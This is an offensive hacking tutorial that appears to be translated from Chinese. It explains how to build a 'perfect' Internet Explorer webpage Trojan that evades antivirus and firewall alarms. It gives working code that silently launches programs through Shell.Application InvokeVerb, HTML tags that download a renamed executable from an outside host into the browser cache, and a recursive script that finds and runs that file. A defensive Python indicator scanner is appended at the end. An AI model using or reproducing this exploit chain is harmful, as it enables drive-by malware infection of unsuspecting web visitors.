Author: bixue Source: Eighth Army
To create a perfect IE webpage Trojan, we must first set ourselves a standard for what "perfect" means. I personally think a perfect IE webpage Trojan should have at least the following four features:
1. It can bypass anti-virus software;
2. It does not trigger network firewall alarms;
3. It works in most IE versions (including IE5.0, IE5.5 and IE6.0) on most Windows operating systems (including Win98, WinME, Win2000, WinXP and Win2003), ideally regardless of which SP patch is installed;
4. It makes it hard for the viewer to notice any change in IE, so it can stay quietly hidden for a long time.
(Note that the above four points refer only to the webpage and do not include your Trojan program. That is, our webpage Trojan is only responsible for running the specified Trojan program; the quality of the Trojan program itself is up to you to choose! Don't ask me for one, I won't write it!)
A webpage Trojan that meets the above four points will keep your trojan fresh longer, live longer and spread faster......
After reading the above, are you tempted? Don't rush. Let's start with the shortcomings of the webpage Trojans that already exist on the Internet!
First: the IE webpage trojan that exploits the ancient MIME vulnerability
This kind of trojan is still popular, but the vulnerability is too old, it applies to few IE versions, its impact at the time was too great and it has been patched almost everywhere, so the planting success rate of this trojan is relatively low.
Second: the IE webpage trojan that uses the com.ms.activeX.ActiveXComponent vulnerability combined with the WSH and FSO controls
Although the com.ms.activeX.ActiveXComponent vulnerability works in most IE versions and is a good vulnerability with high exploitation value, this trojan combines it with the WSH and FSO controls that popular viruses also call, so while it can avoid network firewall alarms, it cannot escape the pursuit of anti-virus software (such as Norton).
Third: the IE webpage trojan that uses the OBJECT Data remote execution vulnerability combined with the WSH and FSO controls (typically represented by the Animated Shark webpage trojan generator)
The biggest advantages of this trojan are that it works in many IE versions and uses a newer vulnerability, but it has the following shortcomings:
1. It uses mshta.exe to access the network to download the trojan program, which causes firewall alarms (such as the Skynet firewall);
2. Because this IE webpage trojan uses the WSH and FSO controls, it also cannot escape the pursuit of anti-virus software (such as Norton).
The Animated Shark webpage trojan uses the WSH and FSO controls, sigh...... unfortunate......?
3. This vulnerability requires the web server to support dynamic web pages such as ASP, JSP or CGI, which limits the choice of web servers; after all, free and stable dynamic web space is scarce. Although this vulnerability can also be exploited in the form of a mail MIME message (see my article on Security Focus: "Starting from a mistaken MIME vulnerability exploitation...... --- Using the IE Object Data remote execution vulnerability", http://www.xfocus.net/articles/200309/607.html), testing found that it does not work in IE6.0.
After reading the analysis above, do you have this feeling: a thousand soldiers are easy to get but one general is hard to find; horses come in herds but a thousand-li horse is hard to find! Don't worry. Let me take you through creating the perfect IE webpage trojan I have in mind.
First of all, we need to get rid of anti-virus software, so we cannot use the WSH and FSO controls, because as long as we use them we cannot escape "Norton". What can we do?! Don't worry. After much hard work (and inspired by an accidental discovery in ASP Trojans), I finally found a usable control, Shell.Application. It passes the security check, runs smoothly in a webpage in the "My Computer" zone, and obtaining execution permission is easier than with WSH and FSO (a cross-zone vulnerability can be used). See the following JavaScript code:
<SCRIPT language="javascript" type="text/javascript">
var shell = new ActiveXObject("Shell.Application");
shell.NameSpace("c:\\Windows\\").Items().Item("Notepad.exe").InvokeVerb();
</SCRIPT>
Save it as test.htm and check whether Notepad opens automatically. The prompt box asking whether to allow the program to run is not shown, unlike with WSH and FSO. Getting interesting? We can now run any program whose path is known, but we need to run our own Trojan program, so we also need to download the Trojan program to the viewer's computer and find its location. One step at a time:
1. Download the trojan program to the viewer's computer.
There are many solutions to this problem, for example the Windows Help file access protocol (its:) arbitrary file download vulnerability I mentioned before, but this time we don't need it. Here are two better download methods:
Example 1: using the SCRIPT tag. The code is as follows:
<SCRIPT language="icyfoxlovelace" src="http://www.godog.y365.com/wodemuma/icyfox.bat"></SCRIPT>
Note that the LANGUAGE attribute here can be any string other than javascript, VBScript and JScript, even Chinese characters. The src attribute is the address of your Trojan! Because free hosting currently does not allow uploading exe files for security reasons, we can change the extension from exe to bat, pif, scr or com.
Example 2: using the LINK tag. The code is as follows:
<LINK href="http://www.godog.y365.com/wodemuma/icyfox.bat" rel=stylesheet type=text/css>
Place the code between the <HEAD></HEAD> tags. The href attribute value is the trojan program address.
The above two are the best methods for downloading Trojans that I know of. The downloaded programs are saved in a subdirectory of the IE temporary directory Temporary Internet Files.
2. Find the path of the trojan program that has been downloaded to the viewer's computer.
We can use some properties and methods of the Shell.Application control, combined with the JS error-handling statement try{}catch(e){}finally{}, called recursively, to find the trojan program's path. The code is as follows:
function icyfoxlovelace(){
  // Obtain the Windows system directory and the system drive
  url=document.location.href;
  xtmu=url.substring(6,url.indexOf('\\',9)+1);
  xtp=url.substr(6,3);
  var shell=new ActiveXObject("Shell.Application");
  var runbz=1;
  // Set the trojan size in bytes.
  // Change 198201 to the actual size of your Trojan program
  var exeSize=198201;
  // Set the trojan program name and extension (exe, com, bat, pif, scr), used to determine whether the trojan program has been downloaded.
  // Change icyfox in the following two lines to your Trojan program name, and change bat to your Trojan program extension.
  var a=/icyfox\[\d*\]\.bat/gi;
  a.compile("icyfox\\[\\d*\\]\\.bat","gi");
  var b=/[A-Za-z]:\\/gi;
  b.compile("[A-Za-z]:\\\\","gi"); // regular expression used to determine whether a path is the root directory of a drive
  // The following code finds and runs the trojan program
  wjj(xtmu+"Temporary Internet Files\\"); // Content.IE5\
  if(runbz) wjj(xtp+"Documents and Settings\\");
  if(runbz) yp();
  // Search for and run the trojan program in all hard disk partitions
  function yp(){
    try{
      var c=new Enumerator(shell.NameSpace("c:\\").ParentFolder.Items());
      for(;!c.atEnd();c.moveNext()){
        if(runbz){if(b.test(c.item().Path)) wjj(c.item().Path);}
        else break;
      }
    }catch(e){}
  }
  // Recursively search for and run the trojan program in a specified directory (including subdirectories)
  function wjj(B){
    try{
      var c=new Enumerator(shell.NameSpace(B).Items());
      for(;!c.atEnd();c.moveNext()){
        if(runbz&&c.item().Size==exeSize&&a.test(c.item().Path)){
          var f=c.item().Path;
          var v=f.lastIndexOf('\\')+1;
          try{
            shell.NameSpace(f.substring(0,v)).Items().Item(f.substr(v)).InvokeVerb(); // run the trojan program
            runbz=0;
            break;
          }catch(e){}
        }
        if(!c.item().Size) wjj(c.item().Path+"\\"); // recurse into a subdirectory
      }
    }catch(e){}
  }
}
icyfoxlovelace();
Save the above code as icyfox.js.
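From the defender's side, the three building blocks described above (the Shell.Application / InvokeVerb launch, the SCRIPT tag with a bogus LANGUAGE attribute or LINK tag whose target is a renamed executable, and the search through Temporary Internet Files) are all static indicators that a web-content filter or mail gateway can flag. The following scanner is an added example written for this page; it is not code from the article or its author. It uses only the Python standard library, and the sample pages it scans are constructed here (the host example.invalid is a placeholder, not a real address).

```python
import re
from html.parser import HTMLParser

# Extensions the article says an exe gets renamed to in order to pass free-hosting upload filters
EXECUTABLE_EXT = re.compile(r"\.(exe|bat|pif|scr|com)(\?.*)?$", re.IGNORECASE)

# Script languages IE actually executes; a <script src> with any other LANGUAGE value
# is never run, so its only purpose is to make IE fetch and cache the target file.
SCRIPT_LANGS = {"javascript", "jscript", "vbscript", "vbs", "ecmascript",
                "javascript1.1", "javascript1.2", "javascript1.3"}

# Indicators inside inline script bodies (spacing-tolerant, case-insensitive)
INLINE_PATTERNS = {
    "shell.application": re.compile(
        r"ActiveXObject\s*\(\s*['\"]\s*shell\s*\.\s*application\s*['\"]\s*\)", re.I),
    "invokeverb": re.compile(r"\.\s*InvokeVerb\s*\(", re.I),
    "temp-internet-files": re.compile(r"Temporary Internet Files", re.I),
}

# Indicators that fetch a file vs. indicators that launch one; both together is the chain
DOWNLOAD_KINDS = {"script-src-executable", "script-bogus-language", "link-href-executable"}
LAUNCH_KINDS = {"shell.application", "invokeverb", "temp-internet-files"}


class IeTrojanIndicatorParser(HTMLParser):
    """Collects (indicator, evidence) pairs while walking an HTML document."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False
        self._script_buf = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "script":
            self._in_script = True
            self._script_buf = []
            src = a.get("src", "")
            lang = a.get("language", "").strip().lower()
            if src and EXECUTABLE_EXT.search(src):
                self.findings.append(("script-src-executable", src))
            if src and lang and lang not in SCRIPT_LANGS:
                self.findings.append(("script-bogus-language", lang))
        elif tag == "link":
            href = a.get("href", "")
            if href and EXECUTABLE_EXT.search(href):
                self.findings.append(("link-href-executable", href))

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies as raw data; buffer them until the end tag
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._script_buf)
            for name, pat in INLINE_PATTERNS.items():
                m = pat.search(body)
                if m:
                    self.findings.append((name, m.group(0)))


def scan_html(text):
    """Return the list of (indicator, evidence) pairs found in an HTML document."""
    p = IeTrojanIndicatorParser()
    p.feed(text)
    p.close()
    return p.findings


def is_download_and_launch(findings):
    """True when the page both fetches an executable and contains launch logic."""
    kinds = {k for k, _ in findings}
    return bool(kinds & DOWNLOAD_KINDS) and bool(kinds & LAUNCH_KINDS)


# Constructed sample mirroring the page layout the article describes (placeholder host)
SAMPLE_HTML = """<html><head>
<LINK href="http://example.invalid/wodemuma/icyfox.bat" rel=stylesheet type=text/css>
<SCRIPT language="icyfoxlovelace" src="http://example.invalid/wodemuma/icyfox.bat"></SCRIPT>
</head><body>
<SCRIPT language="javascript">
var shell = new ActiveXObject("Shell.Application");
shell.NameSpace("c:\\\\Windows\\\\").Items().Item("Notepad.exe").InvokeVerb();
</SCRIPT>
<script src="/static/app.js"></script>
</body></html>"""

# Constructed benign page: ordinary stylesheet and script references
BENIGN_HTML = """<html><head><link rel="stylesheet" href="/site.css">
<script language="javascript" src="/app.js"></script></head>
<body><script>document.title = "hello";</script></body></html>"""

if __name__ == "__main__":
    for kind, evidence in scan_html(SAMPLE_HTML):
        print(f"{kind:24s} {evidence}")
    print("download+launch chain:", is_download_and_launch(scan_html(SAMPLE_HTML)))
    print("benign findings:", scan_html(BENIGN_HTML))
```

The parser treats the LANGUAGE attribute check and the executable-extension check as separate findings so that a page using only one trick still surfaces; the `is_download_and_launch` helper raises the severity only when a fetch indicator and a launch indicator appear together, which is the combination this article builds toward.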